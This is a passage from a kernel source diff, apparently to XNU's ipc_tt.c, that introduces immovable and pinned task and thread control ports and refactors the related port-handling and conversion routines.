IPC_KOBJECT_ALLOC_NONE); + + new_pport = new_kport; + } itk_lock(task); - old_kport = task->itk_self[TASK_FLAVOR_CONTROL]; - old_rdport = task->itk_self[TASK_FLAVOR_READ]; - old_iport = task->itk_self[TASK_FLAVOR_INSPECT]; + old_kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; + old_rdport = task->itk_task_ports[TASK_FLAVOR_READ]; + old_iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; - if (old_kport == IP_NULL) { + old_pport = task->itk_self; + + if (old_pport == 
IP_NULL) { /* the task is already terminated (can this happen?) */ itk_unlock(task); - ipc_port_release_send(new_kport); ipc_port_dealloc_kernel(new_kport); + if (immovable_control_port_enabled) { + ipc_port_dealloc_kernel(new_pport); + } #if CONFIG_MACF mac_exc_free_label(unset_label); #endif @@ -512,19 +619,30 @@ ipc_task_reset( } old_sself = task->itk_settable_self; - task->itk_settable_self = task->itk_self[TASK_FLAVOR_CONTROL] = new_kport; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = new_kport; + task->itk_self = new_pport; + + task->itk_settable_self = ipc_port_make_send(new_kport); /* Set the old kport to IKOT_NONE and update the exec token while under the port lock */ ip_lock(old_kport); + old_kport->ip_alt_port = IP_NULL; ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE); task->exec_token += 1; ip_unlock(old_kport); /* Reset the read and inspect flavors of task port */ - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + if (immovable_control_port_enabled) { + ip_lock(old_pport); + ipc_kobject_set_atomically(old_pport, IKO_NULL, IKOT_NONE); + task->exec_token += 1; + ip_unlock(old_pport); + } + + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { old_exc_actions[i] = IP_NULL; if (i == EXC_CORPSE_NOTIFY && task_corpse_pending_report(task)) { @@ -545,6 +663,11 @@ ipc_task_reset( } task->itk_debug_control = IP_NULL; + if (task->itk_dyld_notify) { + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + } + itk_unlock(task); #if CONFIG_MACF @@ -557,7 +680,16 @@ ipc_task_reset( ipc_port_release_send(old_sself); } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + if (notifiers_ptr) { + for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) { + if (IP_VALID(notifiers_ptr[i])) { + 
ipc_port_release_send(notifiers_ptr[i]); + } + } + kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t)); + } + + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { if (IP_VALID(old_exc_actions[i])) { ipc_port_release_send(old_exc_actions[i]); } @@ -565,6 +697,9 @@ ipc_task_reset( /* destroy all task port flavors */ ipc_port_dealloc_kernel(old_kport); + if (immovable_control_port_enabled) { + ipc_port_dealloc_kernel(old_pport); + } if (old_rdport != IP_NULL) { ipc_port_dealloc_kernel(old_rdport); } @@ -583,16 +718,46 @@ ipc_task_reset( void ipc_thread_init( - thread_t thread) + thread_t thread, + ipc_thread_init_options_t options) { ipc_port_t kport; + ipc_port_t pport; + ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE; + + /* + * Having immovable_control_port_enabled boot-arg set does not guarantee + * thread control port should be made immovable/pinned, also check options. + * + * raw mach threads created via thread_create() have neither of INIT_PINNED + * or INIT_IMMOVABLE set. 
+ */ + if (immovable_control_port_enabled && (options & IPC_THREAD_INIT_IMMOVABLE)) { + alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + + if (pinned_control_port_enabled && (options & IPC_THREAD_INIT_PINNED)) { + alloc_options |= IPC_KOBJECT_ALLOC_PINNED; + } + + pport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, alloc_options); + + kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, IPC_KOBJECT_ALLOC_NONE); + kport->ip_alt_port = pport; + } else { + kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE); + + pport = kport; + } + + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = kport; + + thread->ith_settable_self = ipc_port_make_send(kport); - kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + thread->ith_self = pport; - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = kport; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; thread->ith_special_reply_port = NULL; thread->exc_actions = NULL; @@ -600,6 +765,7 @@ ipc_thread_init( thread->ith_assertions = 0; #endif + thread->ipc_active = true; ipc_kmsg_queue_init(&thread->ith_messages); thread->ith_rpc_reply = IP_NULL; @@ -649,12 +815,26 @@ void ipc_thread_disable( thread_t thread) { - ipc_port_t kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - ipc_port_t iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; - ipc_port_t rdport = thread->ith_self[THREAD_FLAVOR_READ]; + ipc_port_t kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + ipc_port_t iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + ipc_port_t rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + ipc_port_t pport = thread->ith_self; + + /* + * This innocuous looking line is load bearing. + * + * It is used to disable the creation of lazy made ports. 
+ * We must do so before we drop the last reference on the thread, + * as thread ports do not own a reference on the thread, and + * convert_port_to_thread* will crash trying to resurrect a thread. + */ + thread->ipc_active = false; if (kport != IP_NULL) { - ipc_kobject_set(kport, IKO_NULL, IKOT_NONE); + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); } if (iport != IP_NULL) { @@ -665,6 +845,12 @@ ipc_thread_disable( ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE); } + if (pport != kport && pport != IP_NULL) { + assert(immovable_control_port_enabled); + assert(pport->ip_immovable_send); + ipc_kobject_set(pport, IKO_NULL, IKOT_NONE); + } + /* unbind the thread special reply port */ if (IP_VALID(thread->ith_special_reply_port)) { ipc_port_unbind_special_reply_port(thread, TRUE); @@ -687,21 +873,33 @@ ipc_thread_terminate( ipc_port_t iport = IP_NULL; ipc_port_t rdport = IP_NULL; ipc_port_t ith_rpc_reply = IP_NULL; + ipc_port_t pport = IP_NULL; thread_mtx_lock(thread); - kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; - rdport = thread->ith_self[THREAD_FLAVOR_READ]; + /* + * If we ever failed to clear ipc_active before the last reference + * was dropped, lazy ports might be made and used after the last + * reference is dropped and cause use after free (see comment in + * ipc_thread_disable()). 
+ */ + assert(!thread->ipc_active); + + kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + pport = thread->ith_self; if (kport != IP_NULL) { if (IP_VALID(thread->ith_settable_self)) { ipc_port_release_send(thread->ith_settable_self); } - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ith_settable_self = IP_NULL; + thread->ith_self = IP_NULL; if (thread->exc_actions != NULL) { for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { @@ -723,6 +921,14 @@ ipc_thread_terminate( thread_mtx_unlock(thread); + if (pport != kport && pport != IP_NULL) { + /* this thread has immovable control port */ + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); + ipc_port_dealloc_kernel(pport); + } if (kport != IP_NULL) { ipc_port_dealloc_kernel(kport); } @@ -754,45 +960,80 @@ void ipc_thread_reset( thread_t thread) { - ipc_port_t old_kport, new_kport; + ipc_port_t old_kport, new_kport, old_pport, new_pport; ipc_port_t old_sself; ipc_port_t old_rdport; ipc_port_t old_iport; ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; boolean_t has_old_exc_actions = FALSE; + boolean_t thread_is_immovable, thread_is_pinned; int i; #if CONFIG_MACF struct label *new_label = mac_exc_create_label(); #endif - new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + thread_is_immovable = thread->ith_self->ip_immovable_send; + thread_is_pinned = thread->ith_self->ip_pinned; + + if (thread_is_immovable) { + ipc_kobject_alloc_options_t 
alloc_options = IPC_KOBJECT_ALLOC_NONE; + + if (thread_is_pinned) { + assert(pinned_control_port_enabled); + alloc_options |= IPC_KOBJECT_ALLOC_PINNED; + } + if (thread_is_immovable) { + alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + } + new_pport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, alloc_options); + + new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, + IPC_KOBJECT_ALLOC_NONE); + new_kport->ip_alt_port = new_pport; + } else { + new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE); + + new_pport = new_kport; + } thread_mtx_lock(thread); - old_kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - old_rdport = thread->ith_self[THREAD_FLAVOR_READ]; - old_iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; + old_kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + old_rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + old_iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + old_sself = thread->ith_settable_self; + old_pport = thread->ith_self; if (old_kport == IP_NULL && thread->inspection == FALSE) { - /* the is already terminated (can this happen?) */ + /* thread is already terminated (can this happen?) 
*/ thread_mtx_unlock(thread); - ipc_port_release_send(new_kport); ipc_port_dealloc_kernel(new_kport); + if (thread_is_immovable) { + ipc_port_dealloc_kernel(new_pport); + } #if CONFIG_MACF mac_exc_free_label(new_label); #endif return; } - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = new_kport; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ipc_active = true; + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = new_kport; + thread->ith_self = new_pport; + thread->ith_settable_self = ipc_port_make_send(new_kport); + thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL; if (old_kport != IP_NULL) { - ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); + ip_lock(old_kport); + old_kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE); + ip_unlock(old_kport); } if (old_rdport != IP_NULL) { ipc_kobject_set(old_rdport, IKO_NULL, IKOT_NONE); @@ -800,6 +1041,9 @@ ipc_thread_reset( if (old_iport != IP_NULL) { ipc_kobject_set(old_iport, IKO_NULL, IKOT_NONE); } + if (thread_is_immovable && old_pport != IP_NULL) { + ipc_kobject_set(old_pport, IKO_NULL, IKOT_NONE); + } /* * Only ports that were set by root-owned processes @@ -849,6 +1093,10 @@ ipc_thread_reset( ipc_port_dealloc_kernel(old_iport); } + if (thread_is_immovable && old_pport != IP_NULL) { + ipc_port_dealloc_kernel(old_pport); + } + /* unbind the thread special reply port */ if (IP_VALID(thread->ith_special_reply_port)) { ipc_port_unbind_special_reply_port(thread, TRUE); @@ -871,26 +1119,51 @@ ipc_port_t retrieve_task_self_fast( task_t task) { - __assert_only ipc_port_t sright; - ipc_port_t port; + ipc_port_t port = IP_NULL; assert(task == current_task()); itk_lock(task); - assert(task->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL); - - if ((port = task->itk_settable_self) == task->itk_self[TASK_FLAVOR_CONTROL]) { - /* no interposing */ - 
sright = ipc_port_copy_send(port); - assert(sright == port); + assert(task->itk_self != IP_NULL); + + if (task->itk_settable_self == task->itk_task_ports[TASK_FLAVOR_CONTROL]) { + /* no interposing, return the IMMOVABLE port */ + port = ipc_port_make_send(task->itk_self); + if (immovable_control_port_enabled) { + assert(port->ip_immovable_send == 1); + if (pinned_control_port_enabled) { + /* pinned port is also immovable */ + assert(port->ip_pinned == 1); + } + } } else { - port = ipc_port_copy_send(port); + port = ipc_port_copy_send(task->itk_settable_self); } itk_unlock(task); return port; } +/* + * Routine: mach_task_is_self + * Purpose: + * [MIG call] Checks if the task (control/read/inspect/name/movable) + * port is pointing to current_task. + */ +kern_return_t +mach_task_is_self( + task_t task, + boolean_t *is_self) +{ + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + *is_self = (task == current_task()); + + return KERN_SUCCESS; +} + /* * Routine: retrieve_thread_self_fast * Purpose: @@ -907,21 +1180,19 @@ ipc_port_t retrieve_thread_self_fast( thread_t thread) { - __assert_only ipc_port_t sright; - ipc_port_t port; + ipc_port_t port = IP_NULL; assert(thread == current_thread()); thread_mtx_lock(thread); - assert(thread->ith_self[THREAD_FLAVOR_CONTROL] != IP_NULL); + assert(thread->ith_self != IP_NULL); - if ((port = thread->ith_settable_self) == thread->ith_self[THREAD_FLAVOR_CONTROL]) { - /* no interposing */ - sright = ipc_port_copy_send(port); - assert(sright == port); + if (thread->ith_settable_self == thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]) { + /* no interposing, return IMMOVABLE_PORT */ + port = ipc_port_make_send(thread->ith_self); } else { - port = ipc_port_copy_send(port); + port = ipc_port_copy_send(thread->ith_settable_self); } thread_mtx_unlock(thread); @@ -1129,8 +1400,7 @@ thread_get_special_port( int which, ipc_port_t *portp); -kern_return_t -static +static kern_return_t thread_get_special_port_internal( 
thread_inspect_t thread, int which, @@ -1176,7 +1446,6 @@ thread_get_special_port_internal( } *portp = port; - return KERN_SUCCESS; } @@ -1189,6 +1458,26 @@ thread_get_special_port( return thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL); } +static ipc_port_t +thread_get_non_substituted_self(thread_t thread) +{ + ipc_port_t port = IP_NULL; + + thread_mtx_lock(thread); + port = thread->ith_settable_self; + if (IP_VALID(port)) { + ip_reference(port); + } + thread_mtx_unlock(thread); + + if (IP_VALID(port)) { + /* consumes the port reference */ + return ipc_kobject_alloc_subst_once(port); + } + + return port; +} + kern_return_t thread_get_special_port_from_user( mach_port_t port, @@ -1196,29 +1485,49 @@ thread_get_special_port_from_user( ipc_port_t *portp) { ipc_kobject_type_t kotype; - kern_return_t kr; + mach_thread_flavor_t flavor; + kern_return_t kr = KERN_SUCCESS; - thread_t thread = convert_port_to_thread_check_type(port, &kotype, THREAD_FLAVOR_INSPECT, FALSE); + thread_t thread = convert_port_to_thread_check_type(port, &kotype, + THREAD_FLAVOR_INSPECT, FALSE); if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; } + if (which == THREAD_KERNEL_PORT && thread->task == current_task()) { +#if CONFIG_MACF + /* + * only check for threads belong to current_task, + * because foreign thread ports are always movable + */ + if (mac_task_check_get_movable_control_port()) { + kr = KERN_DENIED; + goto out; + } +#endif + if (kotype == IKOT_THREAD_CONTROL) { + *portp = thread_get_non_substituted_self(thread); + goto out; + } + } + switch (kotype) { case IKOT_THREAD_CONTROL: - kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL); + flavor = THREAD_FLAVOR_CONTROL; break; case IKOT_THREAD_READ: - kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_READ); + flavor = THREAD_FLAVOR_READ; break; case IKOT_THREAD_INSPECT: - kr = thread_get_special_port_internal(thread, which, portp, 
THREAD_FLAVOR_INSPECT); + flavor = THREAD_FLAVOR_INSPECT; break; default: panic("strange kobject type"); - break; } + kr = thread_get_special_port_internal(thread, which, portp, flavor); +out: thread_deallocate(thread); return kr; } @@ -1267,6 +1576,7 @@ port_allowed_with_thread_flavor( * Returns: * KERN_SUCCESS Changed the special port. * KERN_INVALID_ARGUMENT The thread is null. + * KERN_INVALID_RIGHT Port is marked as immovable. * KERN_FAILURE The thread is dead. * KERN_INVALID_ARGUMENT Invalid special port. * KERN_NO_ACCESS Restricted access to set port. @@ -1276,7 +1586,7 @@ kern_return_t thread_set_special_port( thread_t thread, int which, - ipc_port_t port) + ipc_port_t port) { kern_return_t result = KERN_SUCCESS; ipc_port_t *whichp, old = IP_NULL; @@ -1285,6 +1595,10 @@ thread_set_special_port( return KERN_INVALID_ARGUMENT; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + switch (which) { case THREAD_KERNEL_PORT: #if CONFIG_CSR @@ -1330,9 +1644,9 @@ thread_set_special_port( * Conditions: * Nothing locked. * Returns: - * KERN_SUCCESS Extracted a send right. + * KERN_SUCCESS Extracted a send right. * KERN_INVALID_ARGUMENT The task is null. - * KERN_FAILURE The task/space is dead. + * KERN_FAILURE The task/space is dead. * KERN_INVALID_ARGUMENT Invalid special port. 
*/ @@ -1361,7 +1675,7 @@ task_get_special_port_internal( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); return KERN_FAILURE; } @@ -1369,6 +1683,7 @@ task_get_special_port_internal( switch (which) { case TASK_KERNEL_PORT: port = ipc_port_copy_send(task->itk_settable_self); + itk_unlock(task); break; case TASK_READ_PORT: @@ -1379,30 +1694,36 @@ task_get_special_port_internal( /* convert_task_to_port_with_flavor consumes a task reference */ task_reference(task); port = convert_task_to_port_with_flavor(task, current_flavor); - goto copyout; + break; case TASK_NAME_PORT: - port = ipc_port_make_send(task->itk_self[TASK_FLAVOR_NAME]); + port = ipc_port_make_send(task->itk_task_ports[TASK_FLAVOR_NAME]); + itk_unlock(task); break; case TASK_HOST_PORT: port = ipc_port_copy_send(task->itk_host); + itk_unlock(task); break; case TASK_BOOTSTRAP_PORT: port = ipc_port_copy_send(task->itk_bootstrap); + itk_unlock(task); break; case TASK_SEATBELT_PORT: port = ipc_port_copy_send(task->itk_seatbelt); + itk_unlock(task); break; case TASK_ACCESS_PORT: port = ipc_port_copy_send(task->itk_task_access); + itk_unlock(task); break; case TASK_DEBUG_CONTROL_PORT: port = ipc_port_copy_send(task->itk_debug_control); + itk_unlock(task); break; default: @@ -1410,9 +1731,6 @@ task_get_special_port_internal( return KERN_INVALID_ARGUMENT; } - itk_unlock(task); - -copyout: *portp = port; return KERN_SUCCESS; } @@ -1426,6 +1744,25 @@ task_get_special_port( return task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL); } +static ipc_port_t +task_get_non_substituted_self(task_t task) +{ + ipc_port_t port = IP_NULL; + + itk_lock(task); + port = task->itk_settable_self; + if (IP_VALID(port)) { + ip_reference(port); + } + itk_unlock(task); + + if (IP_VALID(port)) { + /* consumes the port reference */ + return ipc_kobject_alloc_subst_once(port); + } + + return port; +} kern_return_t task_get_special_port_from_user( 
mach_port_t port, @@ -1433,29 +1770,49 @@ task_get_special_port_from_user( ipc_port_t *portp) { ipc_kobject_type_t kotype; - kern_return_t kr; + mach_task_flavor_t flavor; + kern_return_t kr = KERN_SUCCESS; - task_t task = convert_port_to_task_check_type(port, &kotype, TASK_FLAVOR_INSPECT, FALSE); + task_t task = convert_port_to_task_check_type(port, &kotype, + TASK_FLAVOR_INSPECT, FALSE); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; } + if (which == TASK_KERNEL_PORT && task == current_task()) { +#if CONFIG_MACF + /* + * only check for current_task, + * because foreign task ports are always movable + */ + if (mac_task_check_get_movable_control_port()) { + kr = KERN_DENIED; + goto out; + } +#endif + if (kotype == IKOT_TASK_CONTROL) { + *portp = task_get_non_substituted_self(task); + goto out; + } + } + switch (kotype) { case IKOT_TASK_CONTROL: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL); + flavor = TASK_FLAVOR_CONTROL; break; case IKOT_TASK_READ: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_READ); + flavor = TASK_FLAVOR_READ; break; case IKOT_TASK_INSPECT: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_INSPECT); + flavor = TASK_FLAVOR_INSPECT; break; default: panic("strange kobject type"); - break; } + kr = task_get_special_port_internal(task, which, portp, flavor); +out: task_deallocate(task); return kr; } @@ -1504,11 +1861,12 @@ port_allowed_with_task_flavor( * Nothing locked. If successful, consumes * the supplied send right. * Returns: - * KERN_SUCCESS Changed the special port. + * KERN_SUCCESS Changed the special port. * KERN_INVALID_ARGUMENT The task is null. - * KERN_FAILURE The task/space is dead. + * KERN_INVALID_RIGHT Port is marked as immovable. + * KERN_FAILURE The task/space is dead. * KERN_INVALID_ARGUMENT Invalid special port. - * KERN_NO_ACCESS Restricted access to set port. + * KERN_NO_ACCESS Restricted access to set port. 
*/ kern_return_t @@ -1525,6 +1883,10 @@ task_set_special_port( return KERN_NO_ACCESS; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + switch (which) { case TASK_KERNEL_PORT: case TASK_HOST_PORT: @@ -1576,7 +1938,7 @@ task_set_special_port_internal( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { rc = KERN_FAILURE; goto out_unlock; } @@ -1649,7 +2011,8 @@ out: * Nothing locked. If successful, consumes * the supplied rights and memory. * Returns: - * KERN_SUCCESS Stashed the port rights. + * KERN_SUCCESS Stashed the port rights. + * KERN_INVALID_RIGHT Port in array is marked immovable. * KERN_INVALID_ARGUMENT The task is null. * KERN_INVALID_ARGUMENT The task is dead. * KERN_INVALID_ARGUMENT The memory param is null. @@ -1677,13 +2040,16 @@ mach_ports_register( for (i = 0; i < portsCnt; i++) { ports[i] = memory[i]; + if (IP_VALID(ports[i]) && (ports[i]->ip_immovable_receive || ports[i]->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } } for (; i < TASK_PORT_REGISTER_MAX; i++) { ports[i] = IP_NULL; } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); return KERN_INVALID_ARGUMENT; } @@ -1759,7 +2125,7 @@ mach_ports_lookup( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); kfree(memory, size); @@ -1839,7 +2205,7 @@ task_conversion_eval(task_t caller, task_t victim) * Conditions: * Nothing locked, blocking OK. */ -task_t +static task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval) { int try_failed_count = 0; @@ -1886,7 +2252,7 @@ convert_port_to_locked_task(ipc_port_t port, boolean_t eval) * Conditions: * Nothing locked, blocking OK. 
*/ -task_inspect_t +static task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port) { int try_failed_count = 0; @@ -1928,12 +2294,15 @@ convert_port_to_locked_task_inspect(ipc_port_t port) * Conditions: * Nothing locked, blocking OK. */ -task_read_t -convert_port_to_locked_task_read(ipc_port_t port) +static task_read_t +convert_port_to_locked_task_read( + ipc_port_t port, + boolean_t eval) { int try_failed_count = 0; while (IP_VALID(port)) { + task_t ct = current_task(); task_read_t task; ip_lock(port); @@ -1942,8 +2311,14 @@ convert_port_to_locked_task_read(ipc_port_t port) ip_unlock(port); return TASK_READ_NULL; } - task = (task_read_t)port->ip_kobject; + task = (task_read_t)ipc_kobject_get(port); assert(task != TASK_READ_NULL); + + if (eval && task_conversion_eval(ct, task)) { + ip_unlock(port); + return TASK_READ_NULL; + } + /* * Normal lock ordering puts task_lock() before ip_lock(). * Attempt out-of-order locking here. @@ -2174,7 +2549,8 @@ convert_port_to_task_inspect_locked( static task_read_t convert_port_to_task_read_locked( - ipc_port_t port) + ipc_port_t port, + boolean_t eval) { task_read_t task = TASK_READ_NULL; @@ -2184,11 +2560,11 @@ convert_port_to_task_read_locked( if (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_TASK_READ) { task_t ct = current_task(); - task = (task_t)port->ip_kobject; + task = (task_read_t)ipc_kobject_get(port); assert(task != TASK_READ_NULL); - if (task_conversion_eval(ct, task)) { + if (eval && task_conversion_eval(ct, task)) { return TASK_READ_NULL; } @@ -2241,7 +2617,7 @@ convert_port_to_task_check_type( break; case IKOT_TASK_READ: if (at_most >= TASK_FLAVOR_READ) { - task = convert_port_to_task_read(port); + task = eval_check ? 
convert_port_to_task_read(port) : convert_port_to_task_read_no_eval(port); if (task != TASK_READ_NULL) { type = IKOT_TASK_READ; } @@ -2319,7 +2695,7 @@ convert_port_to_thread_check_type( break; case IKOT_THREAD_READ: if (at_most >= THREAD_FLAVOR_READ) { - thread = convert_port_to_thread_read(port); + thread = eval_check ? convert_port_to_thread_read(port) : convert_port_to_thread_read_no_eval(port); if (thread != THREAD_READ_NULL) { type = IKOT_THREAD_READ; } @@ -2387,7 +2763,7 @@ convert_port_to_space_check_type( break; case IKOT_TASK_READ: if (at_most >= TASK_FLAVOR_READ) { - space = convert_port_to_space_read(port); + space = eval_check ? convert_port_to_space_read(port) : convert_port_to_space_read_no_eval(port); if (space != IPC_SPACE_READ_NULL) { type = IKOT_TASK_READ; } @@ -2456,7 +2832,24 @@ convert_port_to_task_read( if (IP_VALID(port)) { ip_lock(port); if (ip_active(port)) { - task = convert_port_to_task_read_locked(port); + task = convert_port_to_task_read_locked(port, TRUE); + } + ip_unlock(port); + } + + return task; +} + +static task_read_t +convert_port_to_task_read_no_eval( + ipc_port_t port) +{ + task_read_t task = TASK_READ_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if (ip_active(port)) { + task = convert_port_to_task_read_locked(port, FALSE); } ip_unlock(port); } @@ -2519,7 +2912,7 @@ convert_port_to_space_with_flavor( task = convert_port_to_locked_task(port, eval); break; case TASK_FLAVOR_READ: - task = convert_port_to_locked_task_read(port); + task = convert_port_to_locked_task_read(port, eval); break; case TASK_FLAVOR_INSPECT: task = convert_port_to_locked_task_inspect(port); @@ -2565,6 +2958,13 @@ convert_port_to_space_read( return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, TRUE); } +static ipc_space_read_t +convert_port_to_space_read_no_eval( + ipc_port_t port) +{ + return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, FALSE); +} + ipc_space_inspect_t convert_port_to_space_inspect( ipc_port_t port) @@ 
-2592,13 +2992,13 @@ convert_port_to_map_with_flavor( switch (flavor) { case TASK_FLAVOR_CONTROL: - task = convert_port_to_locked_task(port, TRUE); + task = convert_port_to_locked_task(port, TRUE); /* always eval */ break; case TASK_FLAVOR_READ: - task = convert_port_to_locked_task_read(port); + task = convert_port_to_locked_task_read(port, TRUE); /* always eval */ break; case TASK_FLAVOR_INSPECT: - task = convert_port_to_locked_task_inspect(port); + task = convert_port_to_locked_task_inspect(port); /* always no eval */ break; default: task = TASK_NULL; @@ -2628,7 +3028,7 @@ convert_port_to_map_with_flavor( pmap_require(map->pmap); } - vm_map_reference_swap(map); + vm_map_reference(map); task_unlock(task); return map; } @@ -2758,7 +3158,7 @@ convert_port_to_thread_inspect_locked( if (ip_kotype(port) == IKOT_THREAD_CONTROL || ip_kotype(port) == IKOT_THREAD_READ || ip_kotype(port) == IKOT_THREAD_INSPECT) { - thread = (thread_inspect_t)port->ip_kobject; + thread = (thread_inspect_t)ipc_kobject_get(port); assert(thread != THREAD_INSPECT_NULL); thread_reference_internal((thread_t)thread); } @@ -2794,7 +3194,8 @@ convert_port_to_thread_inspect( */ static thread_read_t convert_port_to_thread_read_locked( - ipc_port_t port) + ipc_port_t port, + boolean_t eval) { thread_read_t thread = THREAD_READ_NULL; @@ -2807,7 +3208,7 @@ convert_port_to_thread_read_locked( assert(thread != THREAD_READ_NULL); /* Use task conversion rules for thread control conversions */ - if (task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) { + if (eval && task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) { return THREAD_READ_NULL; } @@ -2826,7 +3227,24 @@ convert_port_to_thread_read( if (IP_VALID(port)) { ip_lock(port); if (ip_active(port)) { - thread = convert_port_to_thread_read_locked(port); + thread = convert_port_to_thread_read_locked(port, TRUE); + } + ip_unlock(port); + } + + return thread; +} + +static thread_read_t +convert_port_to_thread_read_no_eval( + 
